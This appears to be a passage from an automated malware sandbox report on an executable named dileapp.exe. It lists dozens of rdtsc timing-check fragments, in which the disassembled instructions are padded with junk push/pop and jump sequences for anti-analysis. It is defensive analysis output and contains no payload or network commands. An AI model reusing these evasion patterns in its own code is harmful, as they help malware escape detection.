                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11A63B2 second address: 11A63B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D749A second address: 11D74A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D74A5 second address: 11D74AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D74AA second address: 11D74E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCCB120DFDCh 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007FCCB120DFD6h 0x00000010 popad 0x00000011 jmp 00007FCCB120DFDEh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jng 00007FCCB120DFDCh 0x00000020 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D769B second address: 11D76A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D76A1 second address: 11D76B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFDCh 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D76B1 second address: 11D76B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D7831 second address: 11D785B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCCB120DFDBh 0x0000000e js 00007FCCB120DFD6h 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11CAD37 second address: 11CAD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11CAD3B second address: 11CAD51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDCh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11CAD51 second address: 11CAD78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCCB0D02D12h 0x00000009 jmp 00007FCCB0D02D11h 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1195A1C second address: 1195A42 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCCB120DFE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCCB120DFDAh 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D7F8F second address: 11D7F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D8112 second address: 11D8118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D83FE second address: 11D8408 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D86AD second address: 11D86B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D86B3 second address: 11D86C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jne 00007FCCB0D02D06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11DD250 second address: 11DD254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E3986 second address: 11E398F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E398F second address: 11E399E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E3DC8 second address: 11E3DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E3DCC second address: 11E3DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E654E second address: 11E655C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E655C second address: 11E65A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jo 00007FCCB120DFD8h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FCCB120DFE2h 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c js 00007FCCB120DFFAh 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FCCB120DFE8h 0x00000029 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E65A5 second address: 11E65A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E65A9 second address: 11E65F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FCCB120DFD8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov di, bx 0x00000024 push 907B0369h 0x00000029 push eax 0x0000002a push edx 0x0000002b jne 00007FCCB120DFECh 0x00000031 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6906 second address: 11E6914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCCB0D02D06h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6A9D second address: 11E6AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FCCB120DFD6h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E71AF second address: 11E71B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E7404 second address: 11E7409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E7409 second address: 11E741D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FCCB0D02D08h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E7506 second address: 11E750C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E750C second address: 11E7510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E76F5 second address: 11E76F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E76F9 second address: 11E7703 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E7703 second address: 11E7724 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FCCB120DFE4h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E785D second address: 11E7862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E8787 second address: 11E8817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCCB120DFD6h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d pushad 0x0000000e jl 00007FCCB120DFDCh 0x00000014 jnp 00007FCCB120DFD6h 0x0000001a jp 00007FCCB120DFDCh 0x00000020 popad 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FCCB120DFD8h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c jmp 00007FCCB120DFE4h 0x00000041 pushad 0x00000042 mov dh, 60h 0x00000044 mov dword ptr [ebp+13762927h], edi 0x0000004a popad 0x0000004b push 00000000h 0x0000004d mov edi, ecx 0x0000004f push 00000000h 0x00000051 mov dword ptr [ebp+13761905h], ecx 0x00000057 xchg eax, ebx 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FCCB120DFE6h 0x00000060 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E8817 second address: 11E884A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FCCB0D02D19h 0x00000010 jmp 00007FCCB0D02D13h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007FCCB0D02D0Ch 0x0000001f jne 00007FCCB0D02D06h 0x00000025 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E884A second address: 11E8854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FCCB120DFD6h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E9860 second address: 11E986D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FCCB0D02D06h 0x0000000d rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EA327 second address: 11EA34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov esi, dword ptr [ebp+137631DCh] 0x0000000e push 00000000h 0x00000010 stc 0x00000011 push 00000000h 0x00000013 sub si, 2CDCh 0x00000018 sub esi, 6470F37Ah 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007FCCB120DFD6h 0x00000028 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EA0BF second address: 11EA0C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EB4AA second address: 11EB4CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCCB120DFE8h 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EA0C3 second address: 11EA0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EB738 second address: 11EB73C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11ECAD6 second address: 11ECADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EE690 second address: 11EE6A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FCCB120DFD8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11ECADB second address: 11ECAE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FCCB0D02D06h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EE6A1 second address: 11EE710 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCCB120DFDCh 0x00000008 jnc 00007FCCB120DFD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FCCB120DFD8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007FCCB120DFD8h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007FCCB120DFDEh 0x00000052 pushad 0x00000053 popad 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F083C second address: 11F084F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jno 00007FCCB0D02D06h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EF9F1 second address: 11EF9F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F084F second address: 11F0884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 ja 00007FCCB0D02D06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov dword ptr [ebp+138EBA35h], ecx 0x00000015 push 00000000h 0x00000017 adc di, 33BBh 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+13763641h], ecx 0x00000024 sbb ebx, 1EC5F118h 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c pushad 0x0000002d jp 00007FCCB0D02D06h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EF9F8 second address: 11EFA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FCCB120DFE7h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F0884 second address: 11F089A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007FCCB0D02D06h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F1959 second address: 11F195D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F0B0F second address: 11F0B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F195D second address: 11F196F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FCCB120DFD8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F0B19 second address: 11F0B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FCCB0D02D06h 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233AF4 second address: 1233AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233AFD second address: 1233B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C3E second address: 1233C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C42 second address: 1233C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C46 second address: 1233C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FCCB0D02D0Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C5B second address: 1233C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FCCB120DFD6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C7B second address: 1233C90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCCB0D02D0Ah 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1236D92 second address: 1236DA9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCCB120DFDCh 0x00000008 je 00007FCCB120DFD6h 0x0000000e push ebx 0x0000000f jnl 00007FCCB120DFD6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12371FB second address: 12371FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1239515 second address: 1239536 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB120DFD6h 0x00000008 jmp 00007FCCB120DFDFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007FCCB120DFDCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1239536 second address: 123953A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123FC4B second address: 123FC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123FC4F second address: 123FC71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCCB0D02D17h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123FC71 second address: 123FC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F547 second address: 123F54D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F54D second address: 123F5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FCCB120DFE8h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FCCB120DFE8h 0x00000019 popad 0x0000001a push edi 0x0000001b jmp 00007FCCB120DFE4h 0x00000020 pushad 0x00000021 popad 0x00000022 pop edi 0x00000023 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F5A5 second address: 123F5AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F5AB second address: 123F5AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F5AF second address: 123F5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FCCB0D02D0Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F712 second address: 123F718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F718 second address: 123F71C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F71C second address: 123F722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F722 second address: 123F72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1242D5D second address: 1242D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12425D8 second address: 12425DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12425DE second address: 12425E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12429E2 second address: 1242A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FCCB0D02D10h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FCCB0D02D15h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
